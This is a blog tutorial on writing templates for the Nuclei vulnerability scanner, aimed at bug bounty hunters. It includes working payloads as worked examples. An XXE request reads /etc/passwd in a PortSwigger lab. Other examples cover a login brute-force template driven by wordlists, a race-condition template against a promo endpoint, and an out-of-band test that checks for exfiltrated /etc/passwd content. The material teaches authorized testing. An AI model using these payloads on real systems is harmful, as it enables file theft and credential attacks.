Bug bounty programs have become increasingly popular in the world of cyber security, where companies offer rewards to the public for testing their web applications for security vulnerabilities. Bug bounty hunters, also known as ethical hackers, play a crucial role in helping companies identify and address potential security issues. However, manual bug hunting can be time-consuming and resource-intensive, which is why automating the task is crucial.

Nuclei is a powerful tool that has gained a reputation for its effectiveness in automating vulnerability scanning. It has become a go-to tool for many bug bounty hunters, thanks to its flexibility and ease of use. By providing a customizable framework for testing different web application security checks, Nuclei makes it easier for bug bounty hunters to identify vulnerabilities quickly and accurately.

What is Nuclei?

Nuclei is a powerful open-source tool designed to automate vulnerability scanning for web applications. Leveraging YAML templates, Nuclei can effectively execute specific security testing scenarios. While it’s popularly used by red teams, Nuclei can also be beneficial for blue teams, as it can be seamlessly integrated into CI/CD pipelines to enable automated vulnerability testing.

Why use Nuclei?

Nuclei is an impressive open-source project with a large community of contributors, making it free for everyone to use. However, it is worth noting that Nuclei is not a standalone tool and requires a template to run. Fortunately, with over 5000 default templates included, users can start using Nuclei right away with ease.

One of Nuclei’s significant advantages is its simplicity and versatility in supporting various protocols, such as TCP, DNS, Websocket, HTTP, SSL, and more. Nuclei also utilizes “template clustering” to optimize requests to the target server, which can reduce network traffic substantially. By trimming identical requests to the same endpoint, Nuclei avoids making duplicate requests, which can save time and improve overall efficiency.

When executing a template, Nuclei includes a block called “‘info,” which provides users with information about the severity of the vulnerability detected. With this information, users can easily access relevant resources to take appropriate action promptly.

Templating guide

In this section, we are going to learn the basics of templating in Nuclei. While it won’t cover everything, this may help you get the idea how to make your own template for later use as this is the most important thing to learn about Nuclei.

If you have read our previous article about [Ansible](https://binaryte.com/blog/ansible-101-an-introduction-to- automation), you may already know what the YAML file is. The YAML file format is designed to be easily read and understood by humans, allowing the users to define the specifics of how the request will be sent and processed. Thus, users do not have to code by themselves in order to run vulnerability tests automatically.

ID

Each template is assigned a unique ID, which is used to identify the template name in the output, making it easier to associate the detected vulnerabilities with their corresponding templates. ID cannot contain space.

id: xxe-retrieve-file

Information

This section is what we have talked about earlier which contains information including name, author, severity, description, reference, tags and metadata. reference is the most useful tag in this block as it can let you define external sources for further reference. The tags tag can also be useful to identify template and by defining it you Nuclei would be able to run specifically based on the tags you are using.

info:
 name: XXE Retrieve File Vulnerability
 author: abc
 severity: high
 description: Injecting XXE to read content of /etc/passwd file.
 reference: https://portswigger.net/web-security/xxe#exploiting-xxe-to-retrieve-files
 tags: xxe

Metadata

Nuclei supports integration with uncover for passive reconnaissance processes such as Shodan and Censys. The metadata node is structured like this: <engine>-query: '<query>'.

info:
 metadata:
   shodan-query: 'vuln:CVE-2022-25312'

Requests

Nuclei offers flexibility of how you can craft your own requests. The request block is started with the requests tag.

Raw requests

By using raw requests, you can specify the method, header, body, and use the expected output using the matchers. You can test the following request [here](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to- retrieve-files) which basically exploits the XXE vulnerabilities to retrieve /etc/passwd file.

requests:
 - raw:
   - |+
     POST {{RootURL}}/product/stock HTTP/2
     Host: {{Hostname}}
     Content-Type: application/xml

     <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
   matchers:
     - type: dsl
       dsl:
         - 'contains(body, "Invalid product ID:")'

**Base requests **

The above example can also be written by following the base request template instead of raw request. Both work in the same way.

requests:
 - method: POST
   path:
     - "{{RootURL}}/product/stock"
   headers:
     Host: {{Hostname}} #if not work, hardcode the target host (e.g. 0a97002104d90750c05178be00bb00d3.web-security-academy.net)
     Content-Type: application/xml
   body:
     "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE test [ <!ENTITY xxe SYSTEM 'file:///etc/passwd'> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"

**Payload and fuzzing **

Sometimes, you want to fuzz any found parameters. You can add the parameters as a variable name that is defined between $ $ or {{ }}.

requests:
 - raw:
   - |
     POST {{RootURL}}/login HTTP/2
     Host: {{Hostname}}
     Content-Type: application/x-www-form-urlencoded
     username={{username}}&password={{passwd}}

   redirects: true
   payloads:
     username: username.txt
     passwd: passwd.txt
   attack: pitchfork

   matchers:
   - type: status
     status:
       - 302

You can use any wordlists and specify it in the payloads tag. Nuclei supports three different kinds of attack, including batteringram, pitchfork, and clusterbomb which work the same way as the classical burp intruder attack.

To simplify, say that the text files above (username & passwd) contain the following wordlists.

Each type of attack would combine both files differently.

**Battering Ram (single) **

Battering ram only requires a single wordlist. Assuming we only have a username wordlist, the format will look like this.

1st request: username=a&password=a
2nd request: username=b&password=b
3rd request: username=c&password=c

**Pitchfork (multiple) **

This kind of attack enumerates multiple parameters at the same time, based on the word’s index.

1st request: username=a&password=d
2nd request: username=b&password=e
3rd request: username=c&password=f

**Cluster Bomb (multiple) **

Cluster bomb is an extremely resource intensive kind of attack as it iterates all possible combinations of multiple wordlists. the

1st request: username=a&password=d
2nd request: username=a&password=e
3rd request: username=a&password=f
4th request: username=b&password=d
5th request: username=b&password=e
6th request: username=b&password=f
7th request: username=c&password=d
8th request: username=c&password=e
9th request: username=c&password=f

Understanding how each works is important as it can easily break the template. For example, pitchfork and clusterbomb expects multiple templates. The above example uses pitchfork attack type, hence using two wordlists. Failing to follow this, will result in your template fail to compile.

**Smuggling **

It is also possible to do HTTP request smuggling with Nuclei. This kind of vulnerability is difficult to detect as the request is malformed by default. Because of the nature of this attack, the sent request is “broken” and to send the request you need to use the raw http engine followed by the unsafe: true attribute.

**Race Conditions **
Race conditions are quite difficult to implement in some automation tools, yet Nuclei makes it very simple to use. To enable race conditions, you can set the race attribute to true, and specify the number of requests will be repeated with the race_count attribute.

requests:
 - raw:
   - |
     POST {{RootURL}}/promo HTTP/2
     Host: {{Hostname}}
     Content-Type: application/x-www-form-urlencoded
     promo_code=20_off

   race: true
   race_count: 5
   matchers:
   - type: status
     status:
       - 200

**Out of Band Testing **

Nuclei has support for interact.sh APi. Interactsh is an open source tool designed specifically for out of band interactions. {{interactsh-url}} supports http and network requests.

requests:
 - raw:
   - |
     GET {{RootURL}}/oauth/user?redirectUri=https://{{interactsh-url}}
HTTP/2
     Host: {{Hostname}}

   matchers-condition: and
   matchers:
   - type: word
     part: interactsh_protocol # Confirms the HTTP Interaction
     words:
       - "http"

   - type: word
     part: interactsh_protocol # Confirms the DNS Interaction
     words:
       - "dns"

   - type: regex
     part: interactsh_request # Confirms the retrieval of /etc/passwd file
     regex:
       - "root:[x*]:0:0:"

**Workflows **

Workflows define the sequence for the running template which will be helpful as Nuclei works best on specific configurations based on user needs. It is inefficient to run the whole template at once on any technology adopted by the target website. Workflows help the user specify certain templates and actions based on the known tech stack on the target website, improving scanning efficiency by lowering scan times.

**Generic workflows **

The template that wants to be included and run, can be specified directly by its filename or by the directory project as input.

workflows:
  template: files/xxe-vuln-check.yaml
  template: exposures/

**Conditional workflows **

As the name suggests, conditional workflow lets the templates be executed after the previous condition from the previous template is met.

**Templates based **

Templates get executed once another template condition is matched.

workflows:
 - template: jira-detect.yaml
   subtemplates:
     - tags: jira
     - template: exploits/jira/

**Matcher name based **

Templates get executed when the base template finds any result.

workflows:
 - template: tech-detect.yaml
   matchers:
     - name: wordpress
       subtemplates:
         - template: exploits/wp-vuln1.yaml
         - template: exploits/wp-vuln2.yaml

**Subtemplate and matcher name based **

This workflow is useful if you want to chain template execution if the previous condition is met.

workflows:
 - template: tech-detect.yaml
   matchers:
     - name: wordpress
       subtemplates:
         - template: exploits/wp-vuln1.yaml
           subtemplates:
             - template: cve/aa-bb-cc.yaml

Summary

There is much more to learn about Nuclei which can be learned by referring to the documentation. After all, it is a powerful open-source tool that automates the detection of potential vulnerabilities in web applications. Highly customizable nature makes it very ideal for specific use cases. This is also a community-driven tool which benefits from the contributions and feedback of a large community of users.

Nuclei empowers users to swiftly and efficiently address security issues with its seamless integration into existing workflows and detailed reports on detected vulnerabilities. Its versatility, user-friendly interface, and comprehensive feature set make it stand out amongst web security practitioners.